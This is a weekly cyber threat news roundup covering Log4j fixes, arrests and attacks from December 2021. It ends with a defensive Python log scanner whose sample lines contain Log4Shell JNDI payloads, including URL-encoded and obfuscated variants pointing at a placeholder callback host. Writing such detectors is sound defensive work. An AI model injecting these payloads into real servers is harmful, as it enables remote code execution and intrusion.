CyberIntelMag's Threat report

Weekly Cyber Threat Report, December 13 – December 17, 2021

Welcome to CyberIntelMag’s weekly roundup! A place where you can find the most important stories in the cybersecurity world from the past week.

From the good news:

This week’s good news includes Minecraft getting a fix for the Log4j flaw, Ukraine detaining 51 people for selling the data of 300 million US and EU citizens, CISA urging critical infrastructure operators to stay on constant lookout for attacks, Adobe addressing more than 60 flaws in multiple apps, SAP fixing the Log4Shell flaw in 20 programs, and much more.

  • Mojang Studios released a critical Minecraft security update to fix a significant flaw in the Apache Log4j Java logging library used by the Java Edition client and multiplayer servers.
  • Ukraine’s police forces arrested 51 individuals accused of selling stolen personal data of millions of people on hacker forums. Over 300 million people from Europe, Ukraine, and the US were affected.
  • Adobe released security updates addressing over 60 flaws in its Windows and macOS applications. Threat actors could exploit them for code execution, privilege escalation, and denial of service.
  • Google has released an emergency Chrome update, 96.0.4664.110, for Windows, Linux, and Mac that fixes a high-severity zero-day vulnerability being exploited in the wild.
  • CISA has urged critical infrastructure organizations to strengthen their defenses against ongoing and upcoming attacks, encouraging them to review the CISA Insights guidance and adopt a heightened state of awareness.
  • Google has made it easier to stop unsolicited invitations from being added automatically to Google Calendar. This is a setback for threat actors, who frequently used such invitations for phishing and other criminal activity.
  • SAP discovered 32 apps impacted by CVE-2021-44228, a major flaw in the Apache Log4j Java-based logging tool, and has already released fixes for 20 of them, with the other 12 being fixed as soon as feasible.


From the bad news:

This week’s bad news includes phishing that uses QR codes to steal banking details, attackers actively attempting to exploit the Log4j vulnerability, a bug that lets local users gain root on Ubuntu by crashing AccountsService, flaws in WiFi chips that can be abused to steal data, the FBI accidentally revealing where it believes the HelloKitty ransomware gang operates, the Virginia Museum of Fine Arts taking down its website, and others.

  • A novel phishing campaign targeting German e-banking customers is active and uses QR codes to lure victims to credential-stealing pages. The attackers use several techniques to evade email security filters.
  • An unauthorized third party accessed one of Volvo Cars’ file repositories. The breach resulted in the theft of sensitive data but, according to the company, did not affect the safety or security of its customers’ cars or personal data.
  • Researchers found that flaws in combined WiFi/Bluetooth chips can be reached by first compromising a device’s Bluetooth component, and then used to steal passwords and manipulate WiFi traffic.
  • Cyber attackers are aggressively attempting to exploit a severe flaw in the Apache Log4j Java logging library. Disclosed on December 9, the flaw allows unauthenticated remote code execution and access to affected systems.
  • A double-free memory corruption bug in GNOME’s AccountsService component lets an unprivileged local user on Ubuntu desktops crash the service and escalate to root.
  • The FBI inadvertently disclosed that it believes the HelloKitty ransomware group operates out of Ukraine while investigating a data breach at an Oregon-based healthcare firm.
  • IBM Security X-Force found that an attack on an Asian airline in March 2021 was likely carried out by a state-sponsored adversary using a new Slack-based backdoor.
  • Just in time for the holidays, the dreaded Emotet malware has resurfaced and is again infecting systems. Its operators drop Cobalt Strike beacons, which they use to move laterally through a network, steal data, and deploy additional malware.
  • The Virginia Museum of Fine Arts took its website down after a security compromise was discovered late last month; a state inquiry is under way. There is no evidence that any personal or financial data was accessed or misused.
  • The Conti ransomware gang is abusing the severe Log4Shell vulnerability to gain access to internal VMware vCenter Server instances and encrypt virtual machines.
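The Log4Shell items above (active exploitation attempts, and Conti using the bug against vCenter) raise the question most readers will have: how to tell whether their own web servers have been probed. The following is an added example, not part of CyberIntelMag’s report, that scans Apache-style access log lines for JNDI lookup strings after undoing the URL-encoding and `${lower:...}` / `${::-x}` obfuscation that scanners commonly use. The log lines and the 198.51.100.x addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined-log format (not real traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # Plain payload in the User-Agent header
    '10.0.0.7 - - [13/Dec/2021:10:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.10:1389/a}"',
    # URL-encoded payload in the query string, with a ${lower:j} nested lookup
    '10.0.0.9 - - [13/Dec/2021:10:03:44 +0000] '
    '"GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.10%2Fa%7D HTTP/1.1" '
    '404 0 "-" "curl/7.68"',
    # Every letter of "jndi" hidden behind an empty lookup with a default value
    '10.0.0.11 - - [13/Dec/2021:10:04:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.10/x}"',
]

# Innermost ${...} expression (body contains no further $, { or })
INNER = re.compile(r"\$\{([^${}]*)\}")
# Final, de-obfuscated lookup: ${jndi:<proto>://<host>...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/\s}]+)", re.I)


def _resolve(match):
    """Evaluate one innermost Log4j lookup the way the library would."""
    body = match.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return match.group(0)            # this is the payload itself; keep it
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]    # ${env:NOPE:-j} or ${::-j} -> default value
    return match.group(0)                # unknown lookup: leave untouched


def normalize(text, max_rounds=8):
    """Repeatedly URL-decode and collapse nested lookups until nothing changes."""
    for _ in range(max_rounds):
        step = INNER.sub(_resolve, unquote(text))
        if step == text:
            break
        text = step
    return text


def find_jndi(line):
    """Return (protocol, host) for every JNDI lookup found after normalization."""
    return [(proto.lower(), host) for proto, host in JNDI.findall(normalize(line))]


def scan(lines):
    """Return (client_ip, protocol, callback_host) for each log line carrying a payload."""
    hits = []
    for line in lines:
        client = line.split()[0]
        for proto, host in find_jndi(line):
            hits.append((client, proto, host))
    return hits


if __name__ == "__main__":
    for client, proto, host in scan(SAMPLE_LOGS):
        print(f"{client} sent a {proto} lookup pointing at {host}")
```

Two caveats apply. A hit only proves an attempt: confirmation of compromise comes from the Java process making an outbound LDAP, RMI or DNS connection to the callback host, so the second check is egress and DNS logs for the hosts this script extracts. And access logs usually record only the request line, referrer and user agent; payloads placed in other headers or in POST bodies never reach the log, so an absence of hits is not an absence of probing.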

About the author

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.